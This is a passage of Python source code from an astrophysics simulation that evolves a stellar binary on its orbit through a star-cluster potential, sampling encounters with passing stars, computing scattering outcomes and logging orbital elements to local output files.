np.sqrt(G*(m_total|units.MSun)/12/(b|units.pc) * (12*x*(x+1)**3*np.log(1+1/x) - x/(x+1)*(25+52*x+42*x**2+12*x**3)))\n\telse: \n\t\treturn 0|units.kms\n\ndef rho (r, type=\"Plummer\", m_total=4e6, b=1):\n\tif type==\"Plummer\": return 3*(m_total|units.MSun)/4/np.pi/(b|units.pc)**3*(1+(r/(b|units.pc))**2)**-2.5\n\telif type==\"Hernquist\": return (m_total|units.MSun)/2/np.pi/(b|units.pc)**3/(r/(b|units.pc))*(1+r/(b|units.pc))**-3\n\telse: return 0|units.kg/units.m**3\n\ndef tau_0 (a, m_bin, r, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, V=0|units.kms, m_per=1|units.MSun):\n\tQ_max = Q_max_a * a\n\tv0 = np.sqrt(G*(m_bin+m_per)/Q_max)\n\tsigma_rel = np.sqrt(sigma(r, type, m_total, b)**2 + V**2)\n\treturn (2*np.sqrt(2*np.pi)*Q_max**2*sigma_rel*(rho(r, type, m_total, b)/m_per)*(1+(v0/sigma_rel)**2))**-1\n\ndef a_h (m1, m2, r, type=\"Plummer\", m_total=4e6, b=1):\n\treturn (G*(m1*m2/(m1+m2)|units.MSun)/4/sigma(r|units.pc, type, m_total, b)**2).value_in(units.AU)\n\ndef sample_encounter_parameters_old (a, m_bin, r, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, m_per=1|units.MSun):\n\tQ_max = Q_max_a * a\n\trng = default_rng()\n\tv0 = np.sqrt(G*(m_bin+m_per)/Q_max)\n\t# time until the encounter\n\t# tau = rng.exponential(tau_0(a,m_bin,n).value_in(units.yr))|units.yr\n\t# perturber mass\n\t# m_per = 1|units.MSun\n\t# perturber orbital parameters\n\t# v = sample_v_hamers (sigma(r), v0)\n\n\t# sigma -> sigma_rel!\n\tx = (v0/sigma(r, type, m_total, b))**2\n\tv = sample_v_icdf (x, sigma(r, type, m_total, b))\n\tp_max2 = Q_max**2*(1+2*(v0/v)**2)\n\tp = np.sqrt(p_max2*rng.random())\n\taStar = -G*(m_bin+m_per)/v**2\n\teStar = np.sqrt(1+p**2/aStar**2)\n\tiStar = np.arccos(rng.random()*2-1)\n\tOmegaStar = rng.random()*2*np.pi\n\tomegaStar = rng.random()*2*np.pi\n\treturn m_per, aStar, eStar, iStar, OmegaStar, omegaStar\n\ndef normalize (vector):\n\treturn vector / np.linalg.norm(vector)\n\ndef sample_encounter_parameters (a, m_bin, r, phi, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, v_bin=[0,0,0], m_per=1|units.MSun):\n\t# returns the parameters in physical units\n\t# v_bin is the binary CM velocity [v_R, v_phi, v_z]=[v_x, v_y, v_z] in km/s \n\trng = default_rng()\n\n\tQ_max = Q_max_a * a.value_in(units.m)\n\tmu = (G*(m_bin+m_per)).value_in(units.m**3/units.s**2)\n\tv0 = np.sqrt(mu/Q_max)\n\tx = (v0/sigma(r, type, m_total, b).value_in(units.m/units.s))**2\n\tv = sample_v_icdf (x, sigma(r, type, m_total, b)).value_in(units.m/units.s)\n\n\ttheta_v = np.arccos(rng.random()*2-1)\n\tphi_v = rng.random()*2*np.pi\n\tv_x = v*np.sin(theta_v)*np.cos(phi_v)\n\tv_y = v*np.sin(theta_v)*np.sin(phi_v)\n\tv_z = v*np.cos(theta_v)\n\t#initial velocity vector in the binary reference frame\n\tv1 = [v_x-v_bin[0]*1000, v_y-v_bin[1]*1000, v_z-v_bin[2]*1000]\n\n\tp_max2 = Q_max**2*(1+2*(v0/np.linalg.norm(v1))**2)\n\tp = np.sqrt(p_max2*rng.random())\n\taStar = -mu/np.linalg.norm(v1)**2\n\teStar = np.sqrt(1+p**2/aStar**2)\n\n\t# unit vectors perpendicular to velocity\n\te1 = normalize([v1[1], -v1[0], 0])\n\te2 = normalize(np.cross(v1, e1))\n\tangle = rng.random()*2*np.pi\n\t# angular momentum\n\th = (e1*np.cos(angle) + e2*np.sin(angle)) * np.sqrt(mu*aStar*(1-eStar**2))\n\t# eccentricity vector\n\tecc_vector = np.cross(v1, h)/mu + normalize(v1)\n\n\t# now we convert all the vectors to the cluster reference frame\n\t# the unut vectors for that reference frame in cylindrical coordinates\n\tcluster_x = [np.cos(phi), -np.sin(phi), 0]\n\tcluster_y = [np.sin(phi), np.cos(phi), 0]\n\tcluster_z = [0, 0, 1]\n\trotation_matrix = [cluster_x, cluster_y, cluster_z]\n\t# transforming the vectors to the cluster reference frame\n\th = np.matmul(rotation_matrix, h)\n\tecc_vector = np.matmul(rotation_matrix, ecc_vector)\n\n\t# calculating the orbital angles\n\tiStar = np.arccos(normalize(h)[2])\n\t# vector pointitng towards the ascending node\n\tn = normalize([-h[1], h[0], 0])\n\tif n[0]==0 and n[1]==0:\n\t\tOmegaStar = 0\n\telse:\n\t\tOmegaStar = np.arccos(n[0])\n\t\tif n[1]<0: OmegaStar = 2*np.pi - OmegaStar\n\tif h[0]==0 and h[1]==0:\n\t\tomegaStar = np.arctan2(ecc_vector[1], ecc_vector[0])\n\t\tif h[2]<0: omegaStar = 2*np.pi - omegaStar\n\telse:\n\t\tomegaStar = np.arccos(np.dot(n, normalize(ecc_vector)))\n\t\tif ecc_vector[2]<0: omegaStar = 2*np.pi - omegaStar\n\treturn m_per, aStar|units.m, eStar, iStar, OmegaStar, omegaStar\n\n# Inner binary parameters\na_in = 0.01 # Semi-major axis in AU\necc = 0.05 \t# Eccentricity\ninc = np.pi/3 # Inclination with respect to the z-axis\nlong_asc = 0 # Longitude of the ascending node\narg_peri = np.pi / 2 # Arugment of pericentre\nm1 = 5\nm2 = 5\nm_bin = m1+m2 # Total mass in solar masses\nm_bin_init = m_bin|units.MSun\n# q = 1\n\n# M_max = max(m_bin_init+m_per_max, 3*m_per_max) \n\n# Outer binary parameters\necc_out = 0.0 # Outer orbit eccentricity\ninc_out = np.pi/6 # Outer orbit inclination\na_out = 0.5 # Outer semi-major axis in pc\n\n# Start at pericentre\nr = a_out * (1 - ecc_out) # Spherical radius\nR = r * np.cos(inc_out) # Cylindrical radius\nz = r * np.sin(inc_out) # Cylindrical height\n\n# output_file_name = os.path.dirname(os.path.abspath(__file__))+'/history-rtol7.txt'\n\n# is the binary hard?\n# a_h = G*(m1*m2/(m1+m2)|units.MSun)/4/sigma_rel(r|units.pc)**2\n# # print(a_in/a_h.value_in(units.AU))\n# Q=0.25\n# print(((a_in|units.AU)/(64/5 * Q * G**3 * (k.m()|units.MSun)**3 / c**5 / (a_in|units.AU)**3)).value_in(units.yr))\n# print(tau_0 (a_in|units.AU, m_bin|units.MSun, r|units.pc).value_in(units.yr))\n\n# k = KeplerRing(ecc, inc, long_asc, arg_peri, [R1, z1, phi1], v1, a=a_in, m=m_bin, q=1)\n# ts = np.linspace(0, 2*(t2-t1), 1000)\n# k.integrate(ts, pot=pot, relativity=True, gw=True, tau_0=lambda *args: tau_0(args[0]|units.pc, m_bin|units.MSun, args[1]|units.pc).value_in(units.yr), random_number=1.4, rtol=1e-7, atol=1e-10)\n# R2real, z2real, phi2real = k.r(t2-t1)\n# v2real = k.v(t2-t1)\n\n# E1 = (np.linalg.norm(v1)/_kms)**2/2 + evaluatePotentials(pot, R1/_pc, z1/_pc, phi=phi1, use_physical=False) \n# E2 = (np.linalg.norm(v2)/_kms)**2/2 + evaluatePotentials(pot, R2/_pc, z2/_pc, phi=phi2, use_physical=False) \n# E2real = (np.linalg.norm(v2real)/_kms)**2/2 + evaluatePotentials(pot, R2real/_pc, z2real/_pc, phi=phi2real, use_physical=False) \n\ndef evolve_binary_noenc (input):\n\n\tt = input.t\n\n\t# Outer binary parameters\n\ta_out = input.a_out # Outer semi-major axis in pc\n\tecc_out = input.e_out # Outer orbit eccentricity\n\tinc_out = input.inc_out # Outer orbit inclination\n\n\t# Inner binary parameters\n\tm1 = input.m1\n\tm2 = input.m2\n\ta_in = input.a # Semi-major axis in AU\n\tecc = input.e \t# Eccentricity\n\tinc = input.i # Inclination with respect to the z-axis\n\targ_peri = input.omega # Arugment of pericentre\n\tlong_asc = input.Omega # Longitude of the ascending node\n\tm_bin = m1+m2 # Total mass in solar masses\n\n\t# Start at pericentre\n\tr = a_out * (1 - ecc_out) # Spherical radius\n\tR = r * np.cos(inc_out) # Cylindrical radius\n\tz = r * np.sin(inc_out) # Cylindrical height\n\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\telif type=='Kepler': pot = KeplerPotential(amp=m_total*u.solMass)\n\n\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t# Define the KeplerRing\n\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\tk1 = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\t# output_file = open(input.output_file, 'w+')\n\t# print('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri, outer_integration_time, tidal_time, inner_integration_time', file=output_file)\n\t# print(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file, flush=True)\n\n\tif type=='Kepler':\n\t\tT = 2*np.pi*np.sqrt((r|units.pc)**3/G/(m_total|units.MSun))\n\telse:\n\t\tT = 2*np.pi*(r|units.pc)/sigma(r|units.pc, type, m_total, b)\t# approximate outer period\n\tn = max(int(input.n*t/(T.value_in(units.yr))), 100)\t#number of points used to approximate the outer orbit\n\t# n=10\n\tts = np.linspace(0, t, n)+input.t0\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\t\n\tk.integrate(ts, pot=pot, relativity=input.relativity, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, 50, type, m_total, b, m_per=m_per).value_in(units.yr), random_number=1e10, rtol=rtol, atol=atol, approximation=input.approximation, debug_file=input.output_file_2, points_per_period=input.n, ej_method='LSODA')\n\tif k.switch_to_gr:\n\t\tts += k.t_fin\n\t\tk = KeplerRing(k.ecc_fin, k.inc_fin, k.long_asc_fin, k.arg_peri_fin, k.r(k.t_fin), k.v(k.t_fin), a=k.a_fin, m=k._m, q=k._q)\n\t\tk.integrate(ts, pot=pot, relativity=input.relativity, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, 50, type, m_total, b, m_per=m_per).value_in(units.yr), random_number=1e10, rtol=rtol, atol=atol, approximation=2, debug_file=input.output_file_2, points_per_period=input.n)\n\n\t# print('da de di dOmega domega', file=output_file)\n\t# if k.merger: print('merger at', k.t_fin, file=output_file, flush=True)\n\t# else: print(k.t_fin, k.a_fin-a_in, k.ecc_fin-ecc, k.inc_fin-inc, k.long_asc_fin-long_asc, k.arg_peri_fin-arg_peri, k.outer_integration_time, k.tidal_time, k.inner_integration_time, file=output_file, flush=True)\n\t# print('epsilon =', k.epsilon_gr, file=output_file, flush=True)\n\ndef evolve_binary (input):\n\t# 0 - binary has survived until t_final\n\t# 1 - binary has merged\n\t# 2 - binary has been destroyed\n\t# 3 - maximum calculation time exceeded\n\t# 4 - maximum semimajor axis exceeded\n\t# 5 - binary has been ejected from the cluster\n\n\tt_final = input.t|units.yr\n\tm_per = input.m_per|units.MSun\n\n\tif input.includeWeakEncounters: Q_max_a = input.Q_max_a\n\telse: Q_max_a = Q_hybrid_a\n\tQ_min_a = input.Q_min_a\n\t\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\n\tif os.path.isfile(input.sameParameters):\n\t\twith open(input.sameParameters) as f:\n\t\t\tfor line in f:\n\t\t\t\tdata = line.split()\n\t\t\t\tif isfloat(data[0]): break\n\t\t\tt = float(data[0])|units.yr\n\t\t\tR = float(data[1])\n\t\t\tz = float(data[2])\n\t\t\tphi = float(data[3])\n\t\t\tv_R = float(data[4])\n\t\t\tv_z = float(data[5])\n\t\t\tv_phi = float(data[6])\n\t\t\ta_in = float(data[7])\n\t\t\tm_bin = float(data[8])\n\t\t\tq = float(data[9])\n\t\t\tecc = float(data[10])\n\t\t\tinc = float(data[11])\n\t\t\tlong_asc = float(data[12])\n\t\t\targ_peri = float(data[13])\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, phi], [v_R, v_z, v_phi], a=a_in, m=m_bin, q=q)\n\t\toutput_file = open(input.output_file, 'w+')\n\t\tprint('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri random_number_0 dt[yr] n epsilon_gr t_orbit[s] |de|', file=output_file)\t# |de| is the integral of |de/dt|_tidal\n\t\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar t_3body[s]', file=output_file)\n\t\tprint(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\toutput_file.flush()\n\telif input.resume and os.path.isfile(input.output_file):\n\t\twith open(input.output_file) as f:\n\t\t\tfor line in f: pass\n\t\t\tdata = line.split()\n\t\t\tif data[1] == 'merger': return 1\n\t\t\tif data[1] == 'destroyed': return 2\n\t\t\tif data[1] == 'maximum' and data[2] == 'calculation': return 3\n\t\t\tif data[1] == 'maximum' and data[2] == 'semimajor': return 4\n\t\t\tif data[1] == 'ejected': return 5\n\t\t\tt = float(data[0])|units.yr\n\t\t\tif t>t_final: return 0\n\t\t\tfor index in range(14):\n\t\t\t\tif not isfloat(data[index]):\n\t\t\t\t\tprint(\"bad file:\", input.output_file)\n\t\t\t\t\tprint(\"bad line:\", line)\n\t\t\t\t\tprint(\"bad segment:\", data[index])\n\t\t\tR = float(data[1])\n\t\t\tz = float(data[2])\n\t\t\tphi = float(data[3])\n\t\t\tv_R = float(data[4])\n\t\t\tv_z = float(data[5])\n\t\t\tv_phi = float(data[6])\n\t\t\ta_in = float(data[7])\n\t\t\tm_bin = float(data[8])\n\t\t\tq = float(data[9])\n\t\t\tecc = float(data[10])\n\t\t\tinc = float(data[11])\n\t\t\tlong_asc = float(data[12])\n\t\t\targ_peri = float(data[13])\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, phi], [v_R, v_z, v_phi], a=a_in, m=m_bin, q=q)\n\t\toutput_file = open(input.output_file, 'a')\n\telse:\n\t\tt = 0|units.yr\n\n\t\t# Outer binary parameters\n\t\ta_out = input.a_out # Outer semi-major axis in pc\n\t\tecc_out = input.e_out # Outer orbit eccentricity\n\t\tinc_out = input.inc_out # Outer orbit inclination,\n\n\t\t# Inner binary parameters\n\t\tm1 = input.m1\n\t\tm2 = input.m2\n\t\ta_in = input.a # Semi-major axis in AU\n\t\tecc = input.e \t# Eccentricity\n\t\tinc = input.i # Inclination with respect to the z-axis\n\t\targ_peri = input.omega # Arugment of pericentre\n\t\tlong_asc = input.Omega # Longitude of the ascending node\n\t\tm_bin = m1+m2 # Total mass in solar masses\n\t\tm_bin_init = m_bin|units.MSun\n\n\t\t# Start at pericentre\n\t\tr = a_out * (1 - ecc_out) # Spherical radius\n\t\tR = r * np.cos(inc_out) # Cylindrical radius\n\t\tz = r * np.sin(inc_out) # Cylindrical height\n\n\t\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\t\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t\t# Define the KeplerRing\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\t\toutput_file = open(input.output_file, 'w+')\n\t\tprint('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri random_number_0 dt[yr] n epsilon_gr t_orbit[s] |de| |di|', file=output_file)\t# |de| is the integral of |de/dt|_tidal\n\t\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar t_3body[s]', file=output_file)\n\t\tprint(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\toutput_file.flush()\n\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\n\ttimeTotal1 = time.time()\n\ttimeClose = 0\n\ttimeDistant = 0\n\ttimeOrbit = 0\n\ttimeLoop = 0\n\twhile t0):\n\t\t\tif switch_to_gr: approximation = 2\n\t\t\tts = np.linspace(0, dt.value_in(units.yr), n+1)#100*n+1) #n is the number of time intervals\n\t\t\tk.integrate(ts, pot=pot, relativity=input.relativity, tidal_effects=input.tidal_effects, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, Q_max_a, type, m_total, b, args[2]|units.kms, m_per=m_per).value_in(units.yr), random_number=random_number, rtol=rtol, atol=atol, approximation=approximation, debug_file=input.output_file_2, points_per_period=input.n) #, rtol=1e-3, atol=1e-6)\n\t\t\tt += k.t_fin|units.yr\n\t\t\tif k.merger: break\n\t\t\trandom_number = k.probability\n\t\t\touter_integration_time = k.outer_integration_time\n\t\t\ttidal_time = k.tidal_time\n\t\t\tinner_integration_time = k.inner_integration_time\n\t\t\tepsilon_gr = k.epsilon_gr\n\t\t\tde_abs += k.de_abs\n\t\t\tdi_abs += k.di_abs\n\t\t\tif not switch_to_gr: switch_to_gr = k.switch_to_gr\n\t\t\tk = KeplerRing(k.ecc_fin, k.inc_fin, k.long_asc_fin, k.arg_peri_fin, k.r(k.t_fin), k.v(k.t_fin), a=k.a_fin, m=k._m, q=k._q)\n\t\t\tif t>=t_final: break\n\t\t\tR, z, phi = k.r()\n\t\t\tif np.sqrt(R**2+z**2) > 100: break\n\t\ttimeOrbit2 = time.time()\n\t\ttimeOrbit += timeOrbit2 - timeOrbit1\n\t\tR, z, phi = k.r()\n\t\tv_R, v_z, v_phi = k.v()\n\t\tif k.merger:\n\t\t\tprint(t.value_in(units.yr), \"merger\", file=output_file)\n\t\t\treturn 1\n\t\tprint(t.value_in(units.yr), R, z, phi, v_R, v_z, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), random_number_0, dt.value_in(units.yr), n, epsilon_gr, time.time()-time0, de_abs, di_abs, file=output_file)\n\t\toutput_file.flush()\n\t\tif t>=t_final: return 0\n\t\tif np.sqrt(R**2+z**2) > 100:\n\t\t\tprint(t.value_in(units.yr), \"ejected\", file=output_file)\n\t\t\treturn 5\n\t\tif input.includeEncounters:\n\t\t\ttime3body = time.time()\n\t\t\t# sample the perturber parameters\n\t\t\tQ = 0|units.m\n\t\t\twhile Q<=Q_min_a*(k.a()|units.AU):\n\t\t\t\tm_per, aStar, eStar, iStar, OmegaStar, omegaStar = sample_encounter_parameters (k.a()|units.AU, k.m()|units.MSun, np.sqrt(R**2+z**2)|units.pc, phi, Q_max_a, type, m_total, b, [v_R, v_phi, v_z], m_per=m_per)\n\t\t\t\tQ = aStar*(1-eStar)\n\n\t\t\t# perform the scattering\n\t\t\tq = k._q\n\t\t\tm1 = k.m()/(1+q)\n\t\t\tm2 = k.m()*q/(1+q)\n\t\t\tif Q<=Q_hybrid_a*(k.a()|units.AU):\n\t\t\t\ttimeClose1 = time.time()\n\t\t\t\tresult, third_body_final, dv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin, n_3body = scattering_hybrid (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\t\t\ttimeClose2 = time.time()\n\t\t\t\ttimeClose += timeClose2 - timeClose1 \n\t\t\telse:\n\t\t\t\tresult = 0\n\t\t\t\tthird_body_final = 2\n\t\t\t\ttimeDistant1 = time.time()\n\t\t\t\tdv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin = scattering_SA (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\t\t\ttimeDistant2 = time.time()\n\t\t\t\ttimeDistant += timeDistant2 - timeDistant1\n\t\t\t\t \n\t\t\tprint('perturber: ', m_per.value_in(units.MSun), Q.value_in(units.AU), eStar, iStar, OmegaStar, omegaStar, file=output_file)\n\t\t\toutput_file.flush()\n\t\t\tif result == 2:\n\t\t\t\tprint(t.value_in(units.yr), \"destroyed\", file=output_file)\n\t\t\t\treturn 2 \n\t\t\telif result == 1: \n\t\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after more than n_orbits_max bound orbits\", file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telif result == 3: \n\t\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after spending too much time in a 3-body phase\", file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telif result == 0:\n\t\t\t\t# assign new orbital parameters to the binary\n\t\t\t\tif third_body_final == 0: m1 = m_per.value_in(units.MSun)\n\t\t\t\tif third_body_final == 1: m2 = m_per.value_in(units.MSun)\n\t\t\t\tv_R, v_z, v_phi = k.v()\t#velocity before the scattering\n\t\t\t\tx = R * np.cos(phi)\n\t\t\t\ty = R * np.sin(phi)\n\t\t\t\tif input.disableKicks:\n\t\t\t\t\tdv_x = 0\n\t\t\t\t\tdv_y = 0\n\t\t\t\t\tdv_z = 0\n\t\t\t\telse:\n\t\t\t\t\tdv_x = dv_binary[0].value_in(units.kms)\t#velocity change during the scattering\n\t\t\t\t\tdv_y = dv_binary[1].value_in(units.kms)\n\t\t\t\t\tdv_z = dv_binary[2].value_in(units.kms)\n\t\t\t\tdv_R = (x*dv_x+y*dv_y)/R\n\t\t\t\tphi_unit_vector = np.cross([0, 0, 1], [x/R, y/R, 0])\n\t\t\t\tdv_phi = np.dot(phi_unit_vector, [dv_x, dv_y, dv_z])\n\t\t\t\tk = KeplerRing(e_fin, i_fin.value_in(units.rad), Omega_fin.value_in(units.rad), omega_fin.value_in(units.rad), [R, z, phi], [v_R+dv_R, v_z+dv_z, v_phi+dv_phi], a=a_fin.value_in(units.AU), m=m1+m2, q=min(m1/m2, m2/m1))\n\t\t\t\tm_bin = m1+m2\n\t\t\t\tprint(t.value_in(units.yr), R, z, phi, v_R+dv_R, v_z+dv_z, v_phi+dv_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), time.time()-time3body, file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telse:\n\t\t\t\tprint(t.value_in(units.yr), \"something really weird happened: result =\", result, file=output_file)\n\t\t\n\t\ttimeTotal = time.time()-timeTotal1\n\t\tif timeTotal>input.tmax: \n\t\t\tprint(t.value_in(units.yr), 'maximum calculation time (', str(input.tmax), ' s) exceeded', file=output_file)\n\t\t\toutput_file.flush()\n\t\t\treturn 3\n\t\tif k.a() > input.a_max:\n\t\t\tprint(t.value_in(units.yr), 'maximum semimajor axis (', str(input.a_max), ' AU) exceeded', file=output_file)\n\t\t\toutput_file.flush()\n\t\t\treturn 4\n\n\t# timeTotal2 = time.time()\n\t# print(\"total time\", timeTotal2-timeTotal1, \"s\", file=output_file)\n\t# print(\"close interaction time\", timeClose, \"s\", file=output_file)\n\t# print(\"distant interaction time\", timeDistant, \"s\", file=output_file)\n\t# print(\"outer orbit integration time\", timeOrbit, \"s\", file=output_file)\n\toutput_file.close()\n\n\treturn 0\n\ndef evolve_binary_encounters_only (input, n_enc, randomize):\n\n\tif input.includeWeakEncounters: Q_max_a = input.Q_max_a\n\telse: Q_max_a = Q_hybrid_a\n\t\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\n\t# Outer binary parameters\n\ta_out = input.a_out # Outer semi-major axis in pc\n\tecc_out = input.e_out # Outer orbit eccentricity\n\tinc_out = input.inc_out # Outer orbit inclination,\n\n\t# Inner binary parameters\n\tm1 = input.m1\n\tm2 = input.m2\n\ta_in = input.a # Semi-major axis in AU\n\tecc = input.e \t# Eccentricity\n\tinc = input.i # Inclination with respect to the z-axis\n\targ_peri = input.omega # Arugment of pericentre\n\tlong_asc = input.Omega # Longitude of the ascending node\n\tm_bin = m1+m2 # Total mass in solar masses\n\tm_bin_init = m_bin|units.MSun\n\n\t# Start at pericentre\n\tr = a_out * (1 - ecc_out) # Spherical radius\n\tR = r * np.cos(inc_out) # Cylindrical radius\n\tz = r * np.sin(inc_out) # Cylindrical height\n\tphi = 0\n\n\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t# Define the KeplerRing\n\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\toutput_file = open(input.output_file, 'a')\n\tprint('R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri t_3body[s]', file=output_file)\n\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar', file=output_file)\n\tprint(R, z, phi, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\toutput_file.flush()\n\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\n\tfor i in range(n_enc):\n\t\tif randomize:\n\t\t\targ_peri = 2*np.pi*np.random.random_sample()\n\t\t\tlong_asc = 2*np.pi*np.random.random_sample()\n\t\t\tinc = np.arccos(2*np.random.random_sample()-1)\n\t\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\t\t\tprint(R, z, phi, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\t\toutput_file.flush()\n\t\ttime3body = time.time()\n\t\t# sample the perturber parameters\n\t\tm_per, aStar, eStar, iStar, OmegaStar, omegaStar = sample_encounter_parameters (k.a()|units.AU, k.m()|units.MSun, np.sqrt(R**2+z**2)|units.pc, phi, Q_max_a, type, m_total, b, [0, v_phi, 0], m_per=m_per)\n\t\tQ = aStar*(1-eStar)\n\t\tprint('perturber: ', m_per.value_in(units.MSun), Q.value_in(units.AU), eStar, iStar, OmegaStar, omegaStar, file=output_file)\n\t\toutput_file.flush()\n\n\t\t# perform the scattering\n\t\tq = k._q\n\t\tm1 = k.m()/(1+q)\n\t\tm2 = k.m()*q/(1+q)\n\t\tif Q<=Q_hybrid_a*(k.a()|units.AU):\n\t\t\tresult, third_body_final, dv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin, n_3body = scattering_hybrid (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\telse:\n\t\t\tresult = 0\n\t\t\tthird_body_final = 2\n\t\t\tdv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin = scattering_SA (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\n\t\tif result == 2:\n\t\t\tprint(t.value_in(units.yr), \"destroyed\", file=output_file)\n\t\t\treturn 2 \n\t\telif result == 1: \n\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after more than n_orbits_max bound orbits\", file=output_file)\n\t\t\toutput_file.flush()\n\t\telif result == 3: \n\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after spending too much time in a 3-body phase\", file=output_file)\n\t\t\toutput_file.flush()\n\t\telif result == 0:\n\t\t\t# assign new orbital parameters to the binary\n\t\t\tif third_body_final == 0: m1 = m_per.value_in(units.MSun)\n\t\t\tif third_body_final == 1: m2 = m_per.value_in(units.MSun)\n\t\t\tv_R, v_z, v_phi = k.v()\t#velocity before the scattering\n\t\t\tx = R * np.cos(phi)\n\t\t\ty = R * np.sin(phi)\n\t\t\tdv_x = dv_binary[0].value_in(units.kms)\t#velocity change during the scattering\n\t\t\tdv_y = dv_binary[1].value_in(units.kms)\n\t\t\tdv_z = dv_binary[2].value_in(units.kms)\n\t\t\tdv_R = (x*dv_x+y*dv_y)/R\n\t\t\tphi_unit_vector = np.cross([0, 0, 1], [x/R, y/R, 0])\n\t\t\tdv_phi = np.dot(phi_unit_vector, [dv_x, dv_y, dv_z])\n\t\t\tk1 = KeplerRing(e_fin, i_fin.value_in(units.rad), Omega_fin.value_in(units.rad), omega_fin.value_in(units.rad), [R, z, phi], [v_R+dv_R, v_z+dv_z, v_phi+dv_phi], a=a_fin.value_in(units.AU), m=m1+m2, q=min(m1/m2, m2/m1))\n\t\t\tm_bin = m1+m2\n\t\t\tprint(R, z, phi, v_R+dv_R, v_z+dv_z, v_phi+dv_phi, k1.a(), k1.m(), k1._q, k1.ecc(), k1.inc(), 